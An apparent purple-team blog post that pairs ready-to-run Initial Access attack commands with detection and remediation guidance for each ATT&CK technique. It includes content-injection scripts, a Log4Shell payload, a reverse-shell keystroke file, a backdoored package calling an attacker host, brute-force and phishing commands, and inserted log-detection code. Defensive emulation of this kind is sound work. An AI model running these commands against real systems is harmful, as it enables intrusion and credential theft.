MITRE ATTACK Initial Access: Hands-On Purple Team Test Plan

Updated on 12 June 2025

This post details every MITRE ATT&CK Initial Access (TA0001) technique, supplying ready-to-run Caldera commands, blue-team detection analytics, and remediation guidance. Use it to verify coverage in your SOC, strengthen EDR, AV, and SIEM rules, and sharpen threat-hunting skills. 

External reference: MITRE ATT&CK TA0001. See also CISA’s latest advisories for real-world Initial-Access exploits.

Initial Access (TA0001) Hands-On Test Plan

Goal: Emulate each Initial Access tactic on a Linux host protected by security tooling, collect telemetry, and tune detections until coverage is complete.


T1659 – Content Injection

Commands

# Transparent MITM that appends a tracking <img>
# (mitmproxy loads addons from a file with -s; an inline "python:" string is not accepted,
#  and traffic must be redirected to the proxy port, e.g. with an iptables REDIRECT rule)
cat > inject.py <<'PY'
from mitmproxy import http
def response(flow: http.HTTPFlow) -> None:
    if flow.response and "text/html" in flow.response.headers.get("content-type", ""):
        flow.response.text += "<img src=http://{{attacker_ip}}/x>"
PY
mitmproxy --mode transparent -s inject.py

# Scapy sniffer: replace </body> with a malicious <script> in cleartext HTTP responses
sudo python3 - <<'PY'
from scapy.all import IP, TCP, Raw, sniff, sendp
def inj(p):
  if p.haslayer(IP) and p.haslayer(Raw) and b'</body>' in p[Raw].load:
    p[Raw].load = p[Raw].load.replace(b'</body>', b'<script src=http://{{attacker_ip}}/p.js></script></body>')
    # drop the stale length/checksum fields so scapy recomputes them for the modified payload
    del p[IP].len, p[IP].chksum, p[TCP].chksum
    sendp(p, iface="{{iface}}", verbose=0)
sniff(iface="{{iface}}", filter="tcp port 80", prn=inj, store=0)
PY

# iptables + nfqueue live string replace
iptables -t mangle -A PREROUTING -p tcp --dport 80 -j NFQUEUE --queue-num 9
nfqsed -n 9 -p 's|</head>|<iframe src=http://{{attacker_ip}}></iframe></head>|g'


Description

Injects malicious markup or JavaScript into in-transit web traffic, gaining code execution in the victim's browser without redirecting them elsewhere.


Detection Guidance

  • EDR/AV – flag mitmproxy, scapy, or nfqsed launched by non-root users or spawning shells.
  • Network/SIEM – duplicate ARP replies, sudden HTTP response-size deltas, or <script src= strings in proxy logs.
  • Host logs – NETFILTER_CFG audit events indicating live iptables edits.

Remediation Guidance

  • Mandate TLS + HSTS.
  • Set strict Content-Security-Policy (CSP) headers.
  • Use Dynamic ARP Inspection and DHCP-Snooping to block rogue L2 devices.

T1189 – Drive-by Compromise

Commands

# Launch an exploit kit in Docker
docker run -d --name exploitkit -p 8080:80 rodsploit/angler-elk

# Watering-hole payload server
python3 -m http.server 8081 --directory ./payloads

# Reflected XSS injection into vulnerable CMS
curl -X POST -d 'comment=<script src="http://{{attacker_ip}}:8081/a.js"></script>' \
     http://{{target}}/blog?id=1

# Simulated victim browsing
chromium --headless http://{{target}}/compromise.html


Description

The victim merely visits a poisoned site; the browser is exploited and malware downloads transparently.


Detection Guidance

  • EDR/AV – browser spawning shell, curl, or wget.
  • Web proxy/DNS – first-seen domain followed immediately by binary download.
  • SIEM – rule: (category=web AND http_status=200) THEN child_process=cmd.exe within 30 s.


Remediation Guidance

  • Patch browsers and plug-ins; enable exploit mitigations.
  • Deploy ad-blocking/anti-tracking lists on secure DNS or SWG.
  • Use browser isolation for high-risk users.

T1190 – Exploit Public-Facing Application

Commands

# Path traversal probe
curl -k -X POST "https://{{target}}/wp-admin/admin-ajax.php" \
     -F 'action=revslider_show_image&img=../../../../../../etc/passwd'

# Log4Shell callback to a sinkhole
curl -H 'User-Agent: ${jndi:ldap://{{attacker_ip}}/a}' https://{{target}}/login

# SQL Injection enumeration
sqlmap -u "https://{{target}}/search.php?q=test" --batch --current-user

# SSRF request to instance metadata
curl -d 'url=http://169.254.169.254/latest/meta-data/' https://{{target}}/preview


Description

Abuses bugs or misconfigurations in Internet-exposed services to gain a foothold.


Detection Guidance

  • WAF/NGFW – signatures for ../, ${jndi:, or SQL keywords in query strings.
  • EDR/AV – web-server processes spawning shells or network utilities.
  • SIEM – HTTP 4xx/5xx spike followed by new outbound connection from server within 30 s.
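As an added example (not part of the original post), a WAF-style analytic for the first detection bullet, run over constructed access-log lines: it URL-decodes each request before matching the ../, ${jndi: and SQL-keyword signatures, because a double-encoded traversal such as %252e%252e%252f would otherwise slip past a literal string match. The log format, addresses and signature regexes are assumptions; the Log4Shell string in the curl command above travels in the User-Agent header, which only reaches an analytic like this if the header is logged.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the original post). Line 3 hides the traversal
# behind double URL-encoding; line 4 carries the JNDI string in the query instead of a header.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jun/2025:10:00:01 +0000] "GET /search.php?q=test HTTP/1.1" 200 512
10.0.0.9 - - [12/Jun/2025:10:00:02 +0000] "POST /wp-admin/admin-ajax.php?img=../../../../etc/passwd HTTP/1.1" 200 1203
10.0.0.9 - - [12/Jun/2025:10:00:03 +0000] "GET /preview?url=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0
10.0.0.7 - - [12/Jun/2025:10:00:04 +0000] "GET /login?u=%24%7Bjndi%3Aldap%3A%2F%2F203.0.113.1%2Fa%7D HTTP/1.1" 500 0
10.0.0.8 - - [12/Jun/2025:10:00:05 +0000] "GET /search.php?q=test'%20UNION%20SELECT%201,2,3-- HTTP/1.1" 200 900
"""

LINE_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+) [^"]*" (?P<status>\d{3})')

SIGNATURES = {
    "path_traversal": re.compile(r"\.\./|\.\.\\"),
    "log4shell_jndi": re.compile(r"\$\{jndi:", re.IGNORECASE),
    "sql_injection": re.compile(r"\bunion\b.{0,20}\bselect\b|'\s*or\s+\S+\s*=|\bsleep\s*\(", re.IGNORECASE),
}

def normalize(url):
    """URL-decode repeatedly (at most 3 rounds) so %252e%252e%252f style double-encoding
    is matched as ../ instead of slipping past the signatures."""
    for _ in range(3):
        decoded = unquote(url)
        if decoded == url:
            break
        url = decoded
    return url

def scan_access_log(text):
    """Return one hit per (line, signature) with the source IP, status and decoded URL."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        url = normalize(m["url"])
        for name, pattern in SIGNATURES.items():
            if pattern.search(url):
                hits.append({"src": m["src"], "sig": name, "status": int(m["status"]), "url": url})
    return hits

def sources_to_block(hits, min_hits=2):
    """Sources with repeated hits are candidates for a WAF virtual-patch or block rule."""
    counts = {}
    for h in hits:
        counts[h["src"]] = counts.get(h["src"], 0) + 1
    return sorted(s for s, n in counts.items() if n >= min_hits)
```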


Remediation Guidance

  • Virtual-patch via WAF rules.
  • Run web services with least privilege; restrict outbound traffic.
  • Automated dependency scanning and rapid patch pipelines.

T1133 – External Remote Services

Commands

# SSH brute force
hydra -V -L users.txt -P passwords.txt ssh://{{target}}

# VPN login using procured credentials
echo '{{password}}' | openconnect --user {{user}} vpn.corp.local --passwd-on-stdin

# Connect to exposed VNC
ncat --ssl {{target}} 5900

# RDP from Linux
xfreerdp /v:{{windows_host}} /u:'{{domain}}\{{user}}' /p:'{{pass}}'   # quote the backslash so the shell keeps it


Description

Leverages legitimate remote-access protocols (VPN, SSH, RDP, VNC) reachable from the Internet.


Detection Guidance

  • EDR/AV – geo-anomaly on authentication events or unexpected openconnect inside container.
  • Auth logs – bursts of failures followed by success.
  • SIEM – rule: successful VPN logon from ASN not in allow-list + (device_type != corporate).


Remediation Guidance

  • Mandate MFA for all remote services.
  • Geo-fence or risk-score logins; enforce idle timeouts.
  • Disable unused protocols at the perimeter.

T1200 – Hardware Additions

Commands

# Emulate USB-Ethernet gadget
modprobe g_ether && ifconfig usb0 192.168.7.2/24 up

# HID keystroke injection file (Rubber Ducky)
echo -e 'GUI r\nSTRING xterm\nENTER\nSTRING nc -e /bin/bash {{attacker_ip}} 4444\nENTER' > ducky.txt

# Unsigned kernel module
insmod /tmp/evil.ko

# Rogue Wi-Fi adapter auto-connect
nmcli connection add type wifi ifname wlan1 con-name rogue ssid RogueAP


Description

The attacker connects or seeds rogue hardware (USB NIC, HID, Wi-Fi dongle), creating covert entry points.


Detection Guidance

  • EDR/AV – USB insertion, driver install, or unsigned kernel-module load alerts.
  • Endpoint logs – kernel: new high-speed USB device; audit: MODULE_SIG.
  • SIEM – NAC sees unknown MAC or rogue wireless BSSID.


Remediation Guidance

  • Deploy USBGuard or similar device-control policies.
  • 802.1X with certificate auth for wired/wireless.
  • Disable/lock unused physical ports in sensitive areas.

T1566 – Phishing (Parent & Sub-Techniques)

T1566.001 – Spearphishing Attachment

Commands

swaks --attach paystub_update.doc --header 'Subject: Payroll Action Required' \
      --to {{victim_email}} --from hr@corp.fake

Description

Emails a malicious document to entice execution.

Detection Guidance

  • Email gateway – macro or weaponised document detection.
  • EDR/AV – Office process spawning interpreter (python, powershell.exe).
  • SIEM – correlate email_id → hash → execution on endpoint.

Remediation Guidance

  • Block/detonate Office macros from untrusted senders.
  • Enforce SPF, DKIM, DMARC.
  • Run continual phishing-awareness training.

T1566.002 – Spearphishing Link

Commands

swaks --body "Quick review: https://drive.evil/{{uuid}}" \
      --to {{victim_email}} --from notifications@corp.fake


Description

The email contains a malicious hyperlink to a site hosting the payload.


Detection Guidance

  • URL-rewriting service – scan link before redirect.
  • EDR/AV – browser download → reputation look-up.
  • SIEM – DNS query to first-seen domain + HTTP GET > 1 MB.


Remediation Guidance

  • URL sandboxing and real-time link protection.
  • Block executable downloads except via approved update servers.
  • Domain allow-lists for exec leadership.

T1566.003 – Spearphishing via Service

Commands

curl -X POST -H "Authorization: Bearer {{slack_token}}" \
     -d '{"channel":"#general","text":"Urgent! https://tinyurl.com/p0wn"}' \
     https://slack.com/api/chat.postMessage


Description

Phish delivered through a third-party platform (Slack, Teams, GitHub Issues).


Detection Guidance

  • CASB/SaaS API – suspicious links in corp channels.
  • EDR/AV – chat app spawning browser or shell.
  • SIEM – URLs shortened via public shorteners.


Remediation Guidance

  • API-based DLP/URL scanning on collaboration apps.
  • Restrict unsanctioned SaaS tokens with Conditional Access.
  • Awareness training for shadow-IT channels.

T1566.004 – Spearphishing Voice

Commands

twilio api:core:calls:create --from +15551230000 --to {{victim_phone}} \
      --url https://{{attacker_ip}}/vishing.xml


Description

Vishing call attempts to coerce credentials or MFA codes.


Detection Guidance

  • Voice analytics – short robocalls with spoofed caller-ID.
  • SIEM – cross-reference CTI feed of vishing numbers with CDRs.
  • EDR/AV – no direct host signal; monitor identity events.


Remediation Guidance

  • Call-back verification for sensitive ops.
  • Number-reputation services; STIR/SHAKEN validation.
  • Train help-desk on vishing patterns.

T1091 – Replication Through Removable Media

Commands

# Autorun USB payload
printf '[autorun]\nopen=payload.sh' > /mnt/usb/autorun.inf
cp reverse_shell.sh /mnt/usb/payload.sh

# Malicious ISO presented as a USB mass-storage gadget
# (-R/-J keep long file names; the original -b flag would wrongly mark payload.sh as an El Torito boot image)
genisoimage -o bad.iso -R -J /mnt/usb
modprobe g_mass_storage file="$(pwd)/bad.iso" ro=1


Description

Malware transferred via USB/ISO, executed automatically or via social engineering.


Detection Guidance

  • EDR/AV – execution from removable drive letter or mount path.
  • Udev / Windows Event ID 43 – device-insertion events.
  • SIEM – surge in USB logs, new hashes from /media.


Remediation Guidance

  • Disable Autorun; enforce signed USB device control.
  • Block write access to external drives except approved IDs.
  • Air-gap critical systems; use data diodes.

T1195 – Supply-Chain Compromise

T1195.001 – Compromise Software Dependencies / Dev Tools

Commands

# Build and install a poisoned package (pip wheel needs a package directory and build metadata,
# which the bare "echo > backdoor/__init__.py" did not create)
mkdir -p pkg/backdoor && cd pkg
echo 'import urllib.request;urllib.request.urlopen("http://{{attacker_ip}}/p")' > backdoor/__init__.py
printf '[project]\nname = "backdoor"\nversion = "0.0.1"\n' > pyproject.toml
pip wheel . && pip install backdoor-*.whl


Description

Poisoned library inserted into build; downstream hosts import backdoor.


Detection Guidance

  • EDR/AV – Python package install outside corporate index.
  • CI/CD logs – SBOM hash delta.
  • SIEM – developer workstation reaching uncommon PyPI domain.


Remediation Guidance

  • Enforce signed packages and internal mirrors.
  • Dependabot/SCA flag unexpected version jumps.
  • Sandbox builds with runtime scans.

T1195.002 – Compromise Software Supply Chain (Binary Swap)

Commands

cp trojan /srv/repo/app_1.2.3.rpm && createrepo /srv/repo

Description

Trojanised binary replaces legitimate artefact in repository.


Detection Guidance

  • EDR/AV – code-sign mismatch on install.
  • Repo logs – unexpected push by stale account.
  • SIEM – package install where signature ≠ expected thumbprint.


Remediation Guidance

  • Mandatory signature validation in package managers.
  • Reproducible builds; deterministic hashing.
  • Least-privilege CI/CD credentials.

T1195.003 – Compromise Hardware Supply Chain

Commands

ipmitool -I lanplus -H {{bmc_ip}} -U root -P {{bmc_pass}} hpm upgrade rogue.hpm


Description

Flashes malicious firmware to BMC or peripheral before deployment.


Detection Guidance

  • Endpoint Integrity – secure-boot failure or PCR mismatch.
  • SIEM – firmware version not on approved list.
  • Network logs – out-of-band BMC beaconing to unknown IP.


Remediation Guidance

  • Hardware root-of-trust with measured boot.
  • Vendor audits and firmware signing policy.
  • Continuous firmware inventory & drift detection.

T1199 – Trusted Relationship

Commands

# Partner VPN connection
openvpn --config partner.ovpn --auth-user-pass partner.creds

# SSH pivot
ssh -J partner@partner-gw corp@db.internal

# Supplier NFS mount
mount -t nfs4 supplier.example.com:/export /mnt/supplier


Description

Abuses connectivity granted to a supplier, subsidiary, or MSP.


Detection Guidance

  • Zero-Trust logs – cross-tenant session via external IdP.
  • EDR/AV – new SSH tunnel on VPN interface.
  • SIEM – partner IP ranges accessing sensitive VLANs.


Remediation Guidance

  • Segmentation with policy-based access.
  • Regular credential rotation for third parties.
  • Continuous trust evaluation clauses in contracts.

T1078 – Valid Accounts

T1078.001 – Default Accounts

Commands

ssh root@{{target}}  # default credentials in defaults.txt


Description

Leverages vendor default usernames/passwords.


Detection Guidance

  • Auth logs – root logins outside maintenance window.
  • EDR/AV – high-privilege account on non-standard host.
  • SIEM – user=root AND src_ip NOT IN maintenance_jump_boxes.


Remediation Guidance

  • Rotate passwords at build.
  • Disable direct root SSH.
  • Compliance scanning for defaults.

T1078.002 – Domain Accounts

Commands

winexe -U "ORG\\svc:{{pass}}" //{{dc}} cmd /c whoami


Description

Uses service or user accounts that already exist in the domain.


Detection Guidance

  • EDR/AV – unusual host for service-account logon.
  • SIEM – Kerberos TGT issued on workstation OU, not server OU.


Remediation Guidance

  • Tiered admin model.
  • LAPS/secrets rotation for service accounts.
  • Conditional Access enforcing device compliance.

T1078.003 – Local Accounts

Commands

ssh backup@{{target}}   # shared local password


Description

Access via local user with identical credentials across machines.


Detection Guidance

  • Auditd – local user login from different TTY range.
  • EDR/AV – reused password hash across fleet.
  • SIEM – logons user=backup on > 5 hosts/hour.
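Added example (not part of the original post) implementing two of the SIEM analytics in this plan over constructed sshd syslog lines: the T1133 "bursts of failures followed by success" rule and this T1078.003 "user=backup on > 5 hosts/hour" rule. The thresholds, windows and the assumed log year are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sshd syslog lines from several hosts (not from the original post).
SAMPLE_LOG = """\
Jun 12 10:00:01 web1 sshd[2101]: Failed password for admin from 198.51.100.7 port 51234 ssh2
Jun 12 10:00:03 web1 sshd[2102]: Failed password for admin from 198.51.100.7 port 51236 ssh2
Jun 12 10:00:05 web1 sshd[2103]: Failed password for admin from 198.51.100.7 port 51238 ssh2
Jun 12 10:00:09 web1 sshd[2104]: Accepted password for admin from 198.51.100.7 port 51240 ssh2
Jun 12 10:05:00 web2 sshd[3001]: Accepted password for backup from 10.0.0.50 port 40001 ssh2
Jun 12 10:06:00 db1 sshd[3002]: Accepted password for backup from 10.0.0.50 port 40002 ssh2
Jun 12 10:07:00 app1 sshd[3003]: Accepted password for backup from 10.0.0.50 port 40003 ssh2
Jun 12 10:08:00 app2 sshd[3004]: Accepted password for backup from 10.0.0.50 port 40004 ssh2
Jun 12 10:09:00 cache1 sshd[3005]: Accepted password for backup from 10.0.0.50 port 40005 ssh2
Jun 12 10:10:00 bastion sshd[3006]: Accepted password for backup from 10.0.0.50 port 40006 ssh2
"""

LINE_RE = re.compile(r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) (?P<host>\S+) sshd\[\d+\]: "
                     r"(?P<result>Accepted|Failed) \w+ for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+)")

def parse(text, year=2025):
    """Syslog lines carry no year, so one is assumed; returns (ts, host, result, user, src) sorted by time."""
    events = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["host"], m["result"], m["user"], m["src"]))
    return sorted(events)

def failed_then_success(events, threshold=3, window=timedelta(minutes=5)):
    """T1133 analytic: >= threshold failures for one (src, user), then a success within the window."""
    alerts, fails = [], defaultdict(list)
    for ts, host, result, user, src in events:
        if result == "Failed":
            fails[(src, user)].append(ts)
            continue
        recent = [t for t in fails.pop((src, user), []) if ts - t <= window]
        if len(recent) >= threshold:
            alerts.append({"host": host, "user": user, "src": src, "failures": len(recent), "at": ts})
    return alerts

def user_on_many_hosts(events, limit=5, window=timedelta(hours=1)):
    """T1078.003 analytic: one account accepted on more than `limit` distinct hosts inside the window."""
    alerts, seen = [], defaultdict(list)
    for ts, host, result, user, _ in events:
        if result != "Accepted":
            continue
        seen[user] = [(t, h) for t, h in seen[user] if ts - t <= window] + [(ts, host)]
        hosts = {h for _, h in seen[user]}
        if len(hosts) > limit:
            alerts.append({"user": user, "hosts": sorted(hosts), "at": ts})
    return alerts
```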


Remediation Guidance

  • Eliminate shared locals; enforce central identity.
  • Require sudo with MFA.
  • Baseline: one-host-one-password.

T1078.004 – Cloud Accounts

Commands

aws s3 ls --profile stolen


Description

Uses compromised IAM keys or cloud console credentials.


Detection Guidance

  • Cloud logs – console login from new ASN, MFAUsed=false.
  • EDR/AV – aws CLI executed from non-developer workstation.
  • SIEM – GuardDuty “CredentialAccess” findings.


Remediation Guidance

  • Enforce MFA & short-lived tokens.
  • Plant canary credentials to detect copying.
  • Apply least-privilege IAM and SCPs.

T1669 – Wi-Fi Networks

Commands

# Rogue AP
hostapd -B rogue.conf && dhcpd -cf dhcpd.conf wlan0

# Capture WPA handshake
airodump-ng -c 6 --bssid {{target_bssid}} -w cap wlan0
aircrack-ng cap-01.cap -w rockyou.txt

# Evil-twin captive portal
wifiphisher --essid "{{corp_wifi}}" --logging -p oauth-login

# Connect to open guest SSID
nmcli d wifi connect {{open_ssid}}


Description

Exploits insecure or rogue wireless networks to gain entry or harvest credentials.


Detection Guidance

  • Wireless IDS – rogue ESSID/BSSID, de-auth floods.
  • EDR/AV – new wireless profile added on endpoint.
  • SIEM – DHCP lease from unknown AP then internal traffic.


Remediation Guidance

  • 802.1X EAP-TLS for all corp Wi-Fi.
  • WIDS with automatic containment.
  • Segregate or disable guest SSIDs; rotate PSKs often.

Running the Plan in Caldera

  1. Define abilities – each command as a separate ability (executor: sh, platform: linux).
  2. Insert facts – e.g., target, attacker_ip, iface, victim_email.
  3. Bundle into an adversary profile under the Initial Access phase.
  4. Launch operation on a test host with your EDR/AV and logging stack active.
  5. Validate detections, adjust analytic rules, and rerun until every technique fires the intended alert.
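An added helper for steps 1 and 2 (not part of the post or of Caldera itself): it turns the post's {{placeholder}} commands into ability dictionaries laid out like Caldera ability YAML entries, rewriting placeholders into Caldera's #{fact} reference syntax and listing the facts the operation must be seeded with. The plain fact names (Caldera traits are often dotted, e.g. host.ip) and the UUID ability ids are assumptions; the output is printed as JSON, which YAML parsers also read.

```python
import json
import re
import uuid

PLACEHOLDER = re.compile(r"\{\{(\w+)\}\}")

def to_caldera_command(cmd):
    """Rewrite the post's {{fact}} placeholders into Caldera's #{fact} syntax
    and return (command, sorted list of fact names the ability needs)."""
    facts = sorted(set(PLACEHOLDER.findall(cmd)))
    return PLACEHOLDER.sub(lambda m: "#{" + m.group(1) + "}", cmd), facts

def make_ability(name, attack_id, technique, cmd, ability_id=None):
    """Build one linux/sh ability as a dict with the fields of a Caldera ability YAML entry
    (id, name, description, tactic, technique, platforms); ability_id is assumed to be a UUID."""
    command, _ = to_caldera_command(cmd)
    return {
        "id": ability_id or str(uuid.uuid4()),
        "name": name,
        "description": f"{attack_id} emulation from the Initial Access test plan",
        "tactic": "initial-access",
        "technique": {"attack_id": attack_id, "name": technique},
        "platforms": {"linux": {"sh": {"command": command}}},
    }

# Constructed plan entries using commands from this post.
PLAN = [
    ("T1190 path traversal probe", "T1190", "Exploit Public-Facing Application",
     "curl -k -X POST https://{{target}}/wp-admin/admin-ajax.php "
     "-F 'action=revslider_show_image&img=../../../../../../etc/passwd'"),
    ("T1133 SSH brute force", "T1133", "External Remote Services",
     "hydra -V -L users.txt -P passwords.txt ssh://{{target}}"),
    ("T1659 nfqueue string replace", "T1659", "Content Injection",
     "nfqsed -n 9 -p 's|</head>|<iframe src=http://{{attacker_ip}}></iframe></head>|g'"),
]

def build_plan(plan):
    """Return (abilities, facts): the ability dicts plus the union of facts the operation must seed."""
    abilities = [make_ability(*entry) for entry in plan]
    facts = sorted({f for entry in plan for f in to_caldera_command(entry[3])[1]})
    return abilities, facts

if __name__ == "__main__":
    abilities, facts = build_plan(PLAN)
    print("facts to seed:", facts)  # ['attacker_ip', 'target']
    print(json.dumps(abilities, indent=2))
```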

Happy purple-teaming—may every exploit be loud and every defender faster than the log scroll!

Bhanu Namikaze

Bhanu Namikaze is an Ethical Hacker, Security Analyst, Blogger, Web Developer and a Mechanical Engineer. He Enjoys writing articles, Blogging, Debugging Errors and Capture the Flags. Enjoy Learning; There is Nothing Like Absolute Defeat - Try and try until you Succeed.
